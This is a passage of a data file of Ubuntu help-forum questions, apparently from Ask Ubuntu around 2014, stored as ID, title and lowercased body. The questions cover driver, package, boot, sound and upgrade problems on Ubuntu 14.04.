) , libnepomukcore4abi1 : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , libbaloocore4 : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , nepomuk-core-runtime : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , libserf-1-1 : amd64 ( 1.3.3-1 , 1.3.3-1ubuntu0.1 ) , net-tools : amd64 ( 1.60-25ubuntu2 , 1.60-25ubuntu2.1 ) end-date : 2014-08-16 09:03:45 i can not identify anything suspicious . later that day i removed an older version of r-base and re-installed the latest package provided by cran - but that seems even more far fetched as a culprit .
513070	intel wireless ac 7260 not working	i just installed ubuntu 14.04 lts in my new laptop ( asusq502la ) i need help to make my wireless card already look at additional drivers but do n't appear anyvdriver in there . also i already download the drivers from intel and tried this http : //wireless.kernel.org/en/users/drivers/iwlwifi but it does n't work either i hope someboy can help me rfkill list all show this 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no sudo modprobe iwlwifi does n't show anything it just ask for the password . dmesg | grep iwl still does n't show anything .
513071	is there anywhere where i can get ubuntu installed for me ?	i have tried for days to install ubuntu on my lenovo ideapad z510 and i feel like giving up . i really feel like i will like ubuntu , but for some reason i always have some king of problem . i really do n't want to give up on ubuntu , but i do n't want to brick my laptop either . is there anywhere i can have ubuntu installed for me ? i have tried messing with my bios , used a dvd and a usb , but no luck . thanks in advance ! edit : i am based in warwick , ri in the usa . i do n't want to run ubuntu in windows . edit 2 : i will try the suggestion of going to a local shop or best buy . i will edit again if i find this successful . this may take some time because i need to find time to make the visit .
513073	ca n't install webmin on ubuntu server	i have an ubuntu server installed and i want to install webmin on it but i ca n't . i have tried everything but reached no solution . i also set this deb http : //download.webmin.com/download/repository sarge contrib deb http : // webmin.mirror.somersettechsolutions.co.uk/repository sarge contrib in /etc/apt/sources.list . can someone help me ? here is the detail of the problem : t @ aksoy : ~ $ wget http : //prdownloads.sourceforge.net/webadmin/webmin_1.700_all.deb -- 2014-08-18 21:31:47 -- http : //prdownloads.sourceforge.net/webadmin/webmin_1.700_all.deb resolving prdownloads.sourceforge.net ( prdownloads.sourceforge.net ) ... failed : name or service not known . wget : unable to resolve host address âprdownloads.sourceforge.netâ ps : sorry for my bad english
513079	how to install both 32-bit and 64-bit versions of package ?	when i run sudo apt-get intall libcurl4-openssl-dev : i386 it removes libcurl4-openssl-dev package and vice-versa . hot can i install both versions for building both 32-bit and 64-bit version of my program on one machine ?
513080	mumble-django does n't render correctly after 12.04 to 14.04 server upgrade	i recently ran the upgrade on my server to go from 12.04 to 14.04 . i had a couple problems but have gotten almost all of them sorted . one thing that 's still hanging me up is the rendering of the mumble-django administration page . after the update , going to my admin page i get an incorrectly rendered page as shown here . everything appears to be working correctly it 's just a matter of it being a little difficult to understand how things are grouped when it shows up like this . thanks as always !
513081	how do i change options in pam configuration ?	i have an issue that research indicates can be corrected by changing an option in a pam configuration by running pam-auth-update . i 've done that , but can not for the life of me figure out how to change the options from selected to deselected in the interface presented . any hints ? ( i need to disable `` smb password synchronization '' if it makes a difference . )
513083	downsides of enabling access using wins/netbios from windows	i 'm setting up a ubuntu server v14.04 and want to be able to access it using its hostname instead of ip from windows . the solutions i have found are these : sudo gedit /etc/nsswitch.conf hosts : files dns -- > hosts : files wins dns sudo apt-get install winbind being a total newbie to ubuntu , what are the downsides of installing this package and it 's dependencies ? will it kick of any additional resource intensive services etc that steels e.g . bandwidth ? is there another way ? i do n't want to edit my hosts file and i do n't want to setup a dns-controller .
513086	skype 4.3 core dump	xubuntu 14.04new install skype 4.2 does not sign in anymore . skype 4.3 does not start . crashes with the following : username @ sempron : ~/downloads $ gdb skype gnu gdb ( ubuntu 7.7-0ubuntu3.1 ) 7.7 copyright ( c ) 2014 free software foundation , inc. ( gdb ) run starting program : /usr/bin/skype [ thread debugging using libthread_db enabled ] using host libthread_db library `` /lib/i386-linux-gnu/libthread_db.so.1 '' . [ new thread 0xb152eb40 ( lwp 4781 ) ] [ new thread 0xb0bffb40 ( lwp 4782 ) ] [ new thread 0xb01ffb40 ( lwp 4783 ) ] [ new thread 0xaf9feb40 ( lwp 4784 ) ] [ new thread 0xaf1fdb40 ( lwp 4785 ) ] [ new thread 0xae9fcb40 ( lwp 4786 ) ] [ new thread 0xad9fab40 ( lwp 478 : cool : ] [ new thread 0xae1fbb40 ( lwp 4787 ) ] [ new thread 0xad1f9b40 ( lwp 4789 ) ] [ new thread 0xac9f8b40 ( lwp 4790 ) ] [ new thread 0xac1f7b40 ( lwp 4791 ) ] [ new thread 0xab9f6b40 ( lwp 4792 ) ] program received signal sigill , illegal instruction . [ switching to thread 0xae9fcb40 ( lwp 4786 ) ] 0x80c27912 in ? ? ( ) ( gdb )
513089	blue selection line appears in screenshots after installing mate	so , i have xubuntu installed with the default screenshotting program . which is generically called `` take screenshot '' . when selecting the `` selected area '' method mate seems to have a different `` selection area line '' , which is blue . although once the screenshot was taken , i noticed that the blue line still exists in the picture ! when i had xfce , screenshotting was just fine . but after uninstalling xfce and installing mate , that 's where the problem appeared . what i have been doing alternatively is taking a screenshot of the whole page , then cropping the photo , this can be time-consuming and it 's just generally easier to use the `` selected area '' method . here is an example of the blue line : ( as you can see , the blue line surrounds the image )
513091	how to run applications after start in openbox automatically ?	so , i decided to run openbox , but how do i set that after logging in i automatically xfce4-panel and nitrogen starts up ? ! i looked here something , but that only speaks about unity .
513094	ethernet connection intermittently does not work in lts 14.04	i have been having an intermittent issue with my ethernet connection my laptop . i am using ubuntu 14.04 lts 64 bit . i am running a dell 15 7357 . below is the output from lspci -v for my ethernet card : 03:00.1 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 12 ) subsystem : dell device 05f9 flags : bus master , fast devsel , latency 0 , irq 59 i/o ports at 4000 [ size=256 ] memory at e3404000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at e3400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 my wireless connection seem to work somewhat flawlessly ( occasionally there is a network i ca n't connect to , but if i boot into windows i can ) . to the actual issue , sometimes when i plug in an ethernet cable into my laptop , i can see the tray icon trying and trying to establish a successful connection with the ethernet cable , but it never works . i will try disabling and enabling networking through the tray icon , but this does nothing . the only apparent fix seems to be unplugging the ethernet cable , powering down the laptop , power cycling the router , starting the laptop up , and then finally plugging in the ethernet cable . at this point it may or may not work for many days to come , but will eventually give me the same issue again . i would like to understand why this is happening and how to fix it . i have been fortunate enough so far to be able to power cycle the networking hardware when this happens , but it seems like a bad idea to always be able to rely on being able to do that . i have seen some posts talking about using tools like dhclient , or modifying some of the ethernet configuration files . the problem with most of these is that these changes seem to conflict with the network manager , and have unreliable results . i have also seem posts that talk about setting up the connection manually , but upon trying this i was still not able to connect , and it does n't solve the issue especially when i do n't have access to the networking hardware physically or through a management interface . i find it strange because largely ethernet has jsut worked for me in linux , i would think the farther and farther we move into the future , it would becoming increasingly less likely that ethernet would n't just simply work . what steps can i take to start to track down and resolve this issue ? are there steps that work with ubuntu and do n't conflict with the network manager ?
513096	sudo password for terminal	i 'm quite new to linux . i am currently using ubuntu on my hp celeron laptop . i 've been having trouble with my wifi on my laptop . i 've tried pressing the button to activate my wifi but it does n't seem to be responding . so , i 'm trying to run this troubleshooting command : sudo lshw -c network but when i try and press enter , it asks for a sudo password . first of all , what is it ? secondly , where do i get it ? i 'd really appreciate some help . i need to get back on the network at work asap . thanks .
513099	no sound on ubuntu 14.04 ( dual boot with windows 8.1 ) alienware machine	i finally did resolve my dual boot situation , but now i am having a different problem . i am using an alienware 18 machine . it is dual booted between windows 8.1 and ubuntu 14.04 . i can get sound through my headphones , but not through the speakers . i have been looking at all the various threads i can find and none of them seem to be helping me . i have purged and reloaded alsa , multiple times . after finding some information to suggest a possible problem with nvidia video drivers ( no idea why that makes sense ) , i have made sure i have the latest drivers for my graphics card and reloaded alsa again . basically everything i can find that logically makes sense to try ( and a few that do n't ) , i have tried . at least i think so . i have also found some bug report information that simply suggests this is an existing bug . i am at my wits end . any further suggestions would be greatly appreciated . thanks !
513100	how do i install ubuntu linux ?	i currently have recently fixed my 8 year old laptop and i 'm planning to upgrade its os from windows xp to ubuntu . it only has 1 gb of ram . i need to get the 32 bit ubuntu . how do i install it ? should i install from disc or a usb ?
513105	chromium stays in backgound	i 'm running thunderbird 31.0 , firefox 13.0 and chromium 36.0.1985.143 on ubuntu 14.04 . both thunderbird and chromium are open and running . when i click on a link in an email in thunderbird i expected to switch from thunderbird to chromium to the foreground to display the website associated with the link . what happens instead is that chromium wiggles in the launcher and thunderbird is still displayed . i have to click on chromium to see the website . i do n't have this problem with firefox 13.0 . is this normal behaviour with chromium on ubuntu or can you change this so that you switch from thunderbird to chromium automatically ?
513117	notification every 2 minutes , with qr code , what is it ?	does anybody knows what is the meaning of the notification , is a qr code and says : kerropi 20140416-1 , bios f.0.5 system id : 21f7 ? this is in unity , with ubuntu 12.04 lts . i am not signed into any services in this desktop session .
513118	unable to install inkscape on ubuntu 14.04	hi i am new to linux ubuntu 14.04 . i wanted to install inkscape but it has shown following error ( dependencies as it says ) : inkscape : depends : python : any ( > = 2.7.1-0ubuntu2 ) but it is a virtual package depends : libaspell15 ( > = 0.60.7~20110707 ) but 0.60.7~20110707-1ubuntu1 is to be installed depends : libatkmm-1.6-1 ( > = 2.22.1 ) but 2.22.7-2ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.19-0ubuntu6.1 is to be installed depends : libcairo2 ( > = 1.10.0 ) but 1.13.0~20140204-0ubuntu1 is to be installed depends : libcairomm-1.0-1 ( > = 1.6.4 ) but 1.10.0-1ubuntu3 is to be installed depends : libfontconfig1 ( > = 2.9.0 ) but 2.11.0-0ubuntu4.1 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.5.2-1ubuntu2.2 is to be installed depends : libgc1c2 ( > = 1:7.2d ) but 1:7.2d-5ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.30.7-0ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.35.9 ) but 2.40.0-2 is to be installed depends : libglibmm-2.4-1c2a ( > = 2.36.2 ) but 2.39.93-0ubuntu1 is to be installed depends : libgnomevfs2-0 ( > = 1:2.17.90 ) but it is not going to be installed depends : libgomp1 ( > = 4.2.1 ) but 4.8.2-19ubuntu1 is to be installed depends : libgsl0ldbl ( > = 1.9 ) but it is not going to be installed depends : libgtk2.0-0 ( > = 2.24.0 ) but 2.24.23-0ubuntu1.1 is to be installed depends : libgtkmm-2.4-1c2a ( > = 1:2.24.0 ) but 1:2.24.4-1ubuntu1 is to be installed depends : libgtkspell0 ( > = 2.0.10 ) but it is not going to be installed depends : liblcms2-2 ( > = 2.2+git20110628 ) but 2.5-0ubuntu4 is to be installed depends : libmagick++5 ( > = 8:6.7.7.10 ) but it is not going to be installed depends : libpango-1.0-0 ( > = 1.14.0 ) but 1.36.3-1ubuntu1 is to be installed depends : libpangocairo-1.0-0 ( > = 1.14.0 ) but 1.36.3-1ubuntu1 is to be installed depends : libpangoft2-1.0-0 ( > = 1.14.0 ) but 1.36.3-1ubuntu1 is to be installed depends : libpangomm-1.4-1 ( > = 2.27.1 ) but 2.34.0-1ubuntu1 is to be installed depends : libpng12-0 ( > = 1.2.13-4 ) but 1.2.50-1ubuntu2 is to be installed depends : libpopt0 ( > = 1.14 ) but 1.16-8ubuntu1 is to be installed depends : libsigc++-2.0-0c2a ( > = 2.0.2 ) but 2.2.10-0.2ubuntu2 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : libxml2 ( > = 2.7.4 ) but 2.9.1+dfsg1-3ubuntu4.3 is to be installed depends : libxslt1.1 ( > = 1.1.25 ) but 1.1.28-2build1 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed what am i missing ?
513121	wrong kernel running after install	i have installed ubuntu 14.04 from unetbootin . when it reboots after the install , uname -r says : 3.5.0-17-generic ..this means that no modules have loaded for the kernel that is actually installed ( 3.13.0-32-generic ) . does anyone know why this kernel should be installed via the install process ? is it an artifact of using unetbootin ? booting into the unetbootin image gives the correct kernel , and thus the modules load . knowing why is one thing , but i 'm not sure how to remedy it now . because no modules are loaded , i ca n't connect to the network or connect a usb drive . i 've tried update-grub , which seems to find the correct kernel , but does n't seem to tell the system to boot from it . i 've also tried selecting the kernel at boot time using the `` advanced options for ubuntu '' , and the 3.13.x kernel is the only one listed . selecting this lead to the 3.5.x kernel stubbornly loading.. i 'm a fairly accomplished sysadmin , but this one has me flummoxed : ) can anyone help ?
513123	ubuntu install problem	i still have the same problem i made a screenshot , hope you can help me and understand my problem now its always the same permission denied error with the same file what can i do to use win7 and linux so that i can work and play on my laptop ? i tried to put the data on a usb flash drive and install it from there with the wubi exe but still does n't work .
513124	ca n't install wine , held packages	i am getting this error : the following packages have unmet dependencies : udev : depends : libudev1 ( = 204-5ubuntu20.2 ) but 204-5ubuntu20.4 is to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i 've tried to apt-get dist-upgrade and i got the same message : the following packages have been kept back : libudev1 udev 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . i am using ubuntu 64bits 14.04 thank you guys !
513128	vi issue in ssh ttys to ubuntu 14.04.1 lts	after upgrading my server to ubuntu 14.04.1 lts , i can no longer use the vi editor to edit anything in an ssh terminal ( i access the server by launching ssh sessions from cygwin running on windows ) . the empty portions of the vi window fill with garbage . the workaround is to launch an xterm from the server back to my cygwin/x display . using vi from within the xterm works fine . setting my term to vt100/vt220/xterm does not help .
513129	how to select the number of mirrors in a raid10 with mdadm	i know ho to create a raid10 with mdadm but i do n't know what is the parameter for select the number of copies . i have 6 hard drives . using the default values it will make only a copy of 3 hard drives : |hd1 > hd4 |hd2 > hd5 |hd3 > hd6 but i want : |hd1 > hd3 and hd4 |hd2 > hd5 and hd6 thank you .
513138	gui application resolution from text mode os	i 'm trying to turn a computer into a linux thin client via ubuntu . i have a dell optiplex 755 loaded with ubuntu 14.04 installed and fully patched . i 've configured the os to run in text mode and automatically launch the vmware horizon 's client , which works . the issue is that when the horizon client launches , its resolution is only 1/4 of the screen . i 've played with the resolution settings in grub which appears to modify the text environment but not the application environment for horizon 's . can someone point me in the right direction on how to increase the resolution for a gui application launch from text mode so it 's full screen . thanks !
513139	does driver exist for trendnet ac1200 dual band wireless adapter for ubuntu 14.04 64bit ?	i 'm new to ubuntu and was wondering if ubuntu 14.04 64-bit drivers exist for the trendnet ac1200 dual band wireless usb 3.0 adapter . i tried searching the forums for my specific adapter , but no luck . does such a driver exist ? if not , can i use a generic driver for this adapter ? any help is greatly appreciated !
513147	asus 1015e laptop wo n't suspend	i 'm running 14.04.1 lts on an asus 1015e laptop . the computer has not been suspending when i close the laptop . it also does n't suspend when i choose suspend from the system tools . while shut , the wireless light remains on , the fan runs , and the computer gets hot . i 've tried the suggestion on this post : suspend/hibernate does n't work on an asus laptop but it did n't change anything . any suggestions are much appreciated .
513148	how can i get the new 14.04 lock screen back ?	for some reason my lock screen changed a while ago from the new one introduced in 14.04 to the one used in older versions . i 'm not sure what i may have done to have caused this . how can i get the new one back ?
513150	can i disable processor drivers	my toshiba laptop freezes when i plug in the ac power cord.i fix this problem in windows 7 by going into safe mode then control panel > device manager > processors and disable both of them . what i am disabling is the processor driver actually thus preventing the processor from going into c or p states . the problem is , whenever the processor goes in power management or downclocks , the system freezes and shows colorful horizontal or vertical lines . i want to try ubuntu but i do n't know how to disable processor drivers . thanks in advance !
513154	how do i mount nexus 7 to view files from command line	i enabled mtp on the nexus 7 and nautilus registers it and lets me browse the files , but ls /media/usbdrive/ shows me nothing . how do i mount it in such a way that i can explore the device 's internal storage from the command line ?
513156	is it required to update from ubuntu 12.04 to 14.04 ?	i am using ubuntu 12.04 on my samsung chromebook and i have found that ubuntu 14.04 does not work with unity on my chromebook . so do i have to update ubuntu to 14.04 now or can i continue to use 12.04 for as long as i want ? if i do n't have to update then will i be subject to many problems ? or will i be just fine ?
513157	`` unresolvable problem '' error when upgrading from 12.04 to 14.04	so i have solved this issue , but now i have another problem : an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . i am not upgrading to a pre-release version of ubuntu and i am not running a pre-release either . i have unchecked all my 3rd-party packages using ubuntu software manager , edit > software sources ... what else might be wrong ? update after doing sudo update-manager -d and sudo apt-get update ; sudo apt-get dist-upgrade as per jimb 's post , and then running sudo do-release-upgrade , here what i get : err http : //extras.ubuntu.com trusty/main translation-en err http : //extras.ubuntu.com trusty/main translation-en_us err http : //extras.ubuntu.com trusty/main translation-en ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //extras.ubuntu.com trusty/main translation-en fetched 0 b in 0s ( 0 b/s ) checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done === command detached from window ( mon aug 18 23:53:10 2014 ) === === command terminated with exit status 1 ( mon aug 18 23:53:10 2014 ) === update 2 my /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //archive.getdeb.net/ubuntu precise-getdeb apps
513158	gpu overheating while not in use	hi maybe some general explanation about gpu 's will answer my question . my question : after some struggle i managed to install the open source drivers for nvidia my specs : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf114m [ geforce gtx 675m ] ( rev a1 ) when i open up the nvidia server settings i can see that only 1 % of the gpu 's computing power is being used . i can also see that the fan is on and working . furthermore im not doing anything graphically intensive . quite the opposite so the fact that the integrated card isnt being used is surprise enough . ( nevermind i have it set to always use the nvidia card because of the lack of linux support for my dual card setup ) basically the problem is my computer keeps shutting off and i dont understand why . the gpu should not be so hot but i feel it burn . could it be because of its age ? are there some things i could do ? i have everything turned down to a minimum . i will also mention this also happens when i play games in windows . but sporadically and not consistently . at the time this question was written the temp is 85 degrees f and it appears to shut down at ~90 degrees .
513159	ubuntu 14.04 - optical output on ht omega claro halo sound card does n't work	i 'm relatively new to linux . i 'm trying to get 64-bit ubuntu 14.04 to work with my hardware . my ht omega claro halo soundcard is recognized and the analog output works . the optical output appears as a choice in the `` sound '' dialog box , but when i choose it `` sound '' produces the analog output . for example , if i run a speaker test in the `` sound '' dialog for the `` digital output ( s/pdif ) claro halo '' , the test box pops up , but it is titled , `` speaker testing for claro halo analog stereo . '' ( i 'd post a screenshot , but i ca n't seem to copy the image into this text . ) the test produces no sound through the digital output , nor is any sound produced when , for example , i play a dvd . i will appreciate any help you can provide .
513160	help upgrade from 12 to 14 ca n't log in please help	i have been running 12.whatever for a while , no problems . today , i tried the upgrade to 14.04 . the upgrade seemed to go fine . however , when i got to the log in screen , when i logged in it said `` error . report now ? '' or something.. and then it just hangs . i 'm stuck at the purple log in style screen . i looked up some solutions , ctrl-alt-f1 'd , logged in , and at someone 's suggestion did a `` sudo apt-get install -- reinstall gnome '' . after installation and reboot , i no longer even get the log in screen . after the `` u b u n t u '' loading screen it goes black . at this point , i can ctrl-alt-f1 and log in to a command line , but now what ? i 'm hosed ! also , i would simply burn a copy of the 14.04 installation disk and run a new install because i have about 800 gigs of unpartitioned space on the hdd . howver , there is some kind of issue with the sector size allocations ; my swap space seems to be off by a few blocks and unusable . every time i have removed and re-created the swap partition it adds about 1024 to the number of bytes the block is `` off '' by . so , i assume that adding a new installation will just hose things even more . please help ! ! ! in case anyone cares , my system is home built with an intel quad core-duo 2.6ghz , 4gigs ddr3 , 3 hdds .
513161	wifi not working ... still	upgraded to 14.04 from 12.04 ( which was working fine ) . now wifi will not connect most of the time . sometimes when rebooted it connects but most of the time it will not . i have not changed anything with my modem or router . when using ethernet cable it works fine . i am on an asus x54c . i use a motorolla surfboard modem with a cisco wireless router . if there is no help with this problem can someone tell me if i can go back to 12.04 ( which was working fine ) without losing any data . thanks for your help , greg
513165	12.04 lts - 14.04 lts file manager : no sidebar tree or menu bar	after upgrading from desktop 12.04 lts to desktop 14.04 lts . the file manager seems to be severely degraded . the sidebar no longer allows a tree-structured view of directories . the menu bar is very limited with no file , edit , view , etc . there does not seem to be any alternate means of doing what these things did in 12.04 . any insights appreciated . -chaz
513166	weird graphical glitches with xubuntu 14.04 including folder icons disappearing on mouseover	iâve just installed the above version on my ailing dell dimension tower pc - great to be able to get it up and running again ... the only thing is that there seems to be a strange graphics issue - some of the icons in finder windows disappear on mouseover . also , the system has a habit of randomly highlighting text in strange colours so that it is unreadable . very odd . as the problem is quite difficult to explain in words , iâm made a short screencast video on youtube to share the problem as it appears to me : http : //youtu.be/vn0uq_kjhcg any help greatly appreciated !
513167	three internal speakers only two working	i 've been working with ubuntu for awhile and i just purchased a new laptop . i dreaded having windows 8.1 so i decided to install ubuntu . my laptop has three built-in speakers ( two normal speakers and one used as a subwoofer ) and i ca n't figure out what settings to adjust to get that third speaker working .
513172	how can i install odbc on ubuntu ?	i need the odbc driver on ubuntu to connect r with postgresql , but i do n't know how to install it .
513177	restore task switcher menu on lubuntu	my system is lubuntu , freshly installed , and has been working fine for a couple of days . i do n't know since when , but when i press alt+tab i can not see my task switcher . instead , some window border is highlighted . but neither the window content , nor the application icon is provided , it is useless for task selecting . how can i get the original task switcher back ?
513180	how to resize swap ( not just adding it )	i made ubuntu 14.04 ( 64bit ) in my vm and i gave it 350gb of my 1tb hdd space and i did it fixed ( not dynamically allocated ) and i did it as a vdi and in my settings i set it to read the space as a ssd . i gave it 2 processors with 2000mb which is low so i was going to set up about 20gb of swap and swappiness of 50 . i was going to follow this guide to set up swap : https : //www.digitalocean.com/community/tutorials/how-to-add-swap-on-ubuntu-14-04 this is what i got : oggie7797 @ oggie7797-virtualbox : ~ $ sudo swapon -s [ sudo ] password for oggie7797 : filename type size used priority /dev/sda5 partition 2044924 14344 -1 oggie7797 @ oggie7797-virtualbox : ~ $ free total used free shared buffers cached mem : 2000792 1741236 259556 25060 13084 349624 -/+ buffers/cache : 1378528 622264 swap : 2044924 14344 2030580 oggie7797 @ oggie7797-virtualbox : ~ $ as you can see , it shows that i have swap even though this is a fresh install and all i have done is install chrome-dev browser . so , now that i have given as much information that i can think to give i hope that someone can help me figure out how to either delete and create a fresh swap of my desired size or just simply edit this mysteriously preexisting swap to a larger size . thanks in advance ! : )
513183	using garena+ to play league of legends ph	as you read the title.. so how could i use garena+ to run league of legends . i also use wine to run garena , and i also have tried playonlinux but still when i press `` start league of legends '' it just loads then nothing pop 's up or league of legends does n't open/run . advance thanks for the reply ...
513186	computer wo n't wake up after suspend	okay so i have had this problem with several versions of linux two primarily being xubuntu 14.04 and ubuntu 14.04 lts , but i have also experienced the issue with cent os 7 . i have several issues with the current distro ubuntu 14.04 and before i make it my primary os i want to repair the issues . first is the waking issue , after i have closed my laptop and left it alone for several hours ( sometimes not so long but sometimes i can go hours and not experience the issue ) i open the laptop back up and it wo n't wake up from suspend . i literally have to turn the computer off and restart it . which brings me to the next intermittent issue , after restarting the computer ( sometimes not all the time ) the mouse and keyboard does n't work and it has to be restarted again to have them operational . neither of the problems are persistent but both are rather annoying . i am running a dual boot on a toshiba satellite l775 with windows 7 . system specs as pulled from the terminal : bios : vendor : american megatrends inc. physical id : 0 version : 1.30 date : 05/11/2011 size : 64kib capacity : 1984kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification uefi dual core cpu : product : amd a4-3300m apu with radeon ( tm ) hd graphics vendor : advanced micro devices [ amd ] physical id : 1 bus info : cpu @ 0 size : 1200mhz capacity : 1200mhz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp x86-64 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt arat cpb hw_pstate npt lbrv svm_lock nrip_save pausefilter cpufreq idk if there is anything else that is needed but if there is i will gladly provide it .
513189	ubuntu 14.04 update lightdm broken	i think the screenshot explains it better than i can . i 'd like to post a helpful bug report on launchpad , but how do i even explain this ? this seems to have come on as a result of a failed update - the desktop was in this condition after i restarted . mouse events in the launcher or menu bar on the small desktop updates the graphics on both the small desktop and the large ( note this is a single laptop screen . ) the greeter looks and behaves fine , but entering a password and pressing enter brings up the broken desktop as seen above . i tried these from command-line mode , and received the same result every time . sudo unity -- reset sudo lightdm restart sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install cinnamon ( note that cinnamon had very similar problems ) i 'm currently using the 3.13.0-32-generic kernel , which works perfectly fine . how do i even begin to debug this ? should i just reinstall ? the computer is only about a year old , so i 'm not averse to that . will running updates on the older kernel fix the problem ? edit : actually , i do recall choosing a different driver ( under the additional drivers application ) as an attempt to squeak out better gaming fps - is that a probable cause ?
513192	hdajackretask 14.04 resets on restart	so i have an issue with hdajackretask . seems that whenever i have the thing set up , it works great until i restart my computer , in which case , the `` show unconnected pins '' option becomes unselected and the subs become empty weight until i open it back up again . how to fix ?
513194	help with recoverinig windows boot manager with kernel-less grub ?	i installed a dual boot ubuntu with windows 8 a while ago on my sisters computer , but i did n't need ubuntu anymore . so i followed instructions on how to remove ubuntu , grub , and restore windows boot manager . but , i do n't get windows . i get a cmd grub and that 's it . i am very frustrated and upset because the computer is useless now . is there any way to fix it ?
513196	resolution changes when using switch	so , the `` real '' resolution of my monitor is 1024x768 . that 's what i 'd use on my docked windows laptop , and what i 'd use on my xubuntu desktop connected directly . when i connect a switch , to switch between the two , however , the ubuntu machine 's resolution changes . everything 's still proportional , and it still thinks it 's doing 1024x768 , but the icons and fonts appear larger . not 800x600 larger , but still big . when i used xubuntu precise , i created an xorg.conf file to set a resolution of 1280x1024 which made it look the way it does without the switch ... as a workaround . when i upgraded to trusty , i lost this . i tried to re-create it , but does n't seem to load my file . ideally , i 'd like to correct the original problem , but i 'd settle for being able to up the resolution . i searched for a while , and tried to do it , but i 'm giving up ... please help me out . controller : intel corporation 82915g/p/gv/gl/pl/910gl memory controller hub ( rev 04 ) monitor : nec multisync lcd 1850e http : //www.necdisplay.com/documents/usermanuals/lcd1850e_manual.pdf os : xubuntu 14.04 trusty /etc/x11/xorg.conf : # you created this file # sudo leafpad /etc/x11/xorg.conf section `` device '' identifier `` configured video device '' endsection section `` monitor '' identifier `` nec lcd1850e '' # i found synchronization range at : # http : //www.necdisplay.com/documents/usermanuals/lcd1850e_manual.pdf 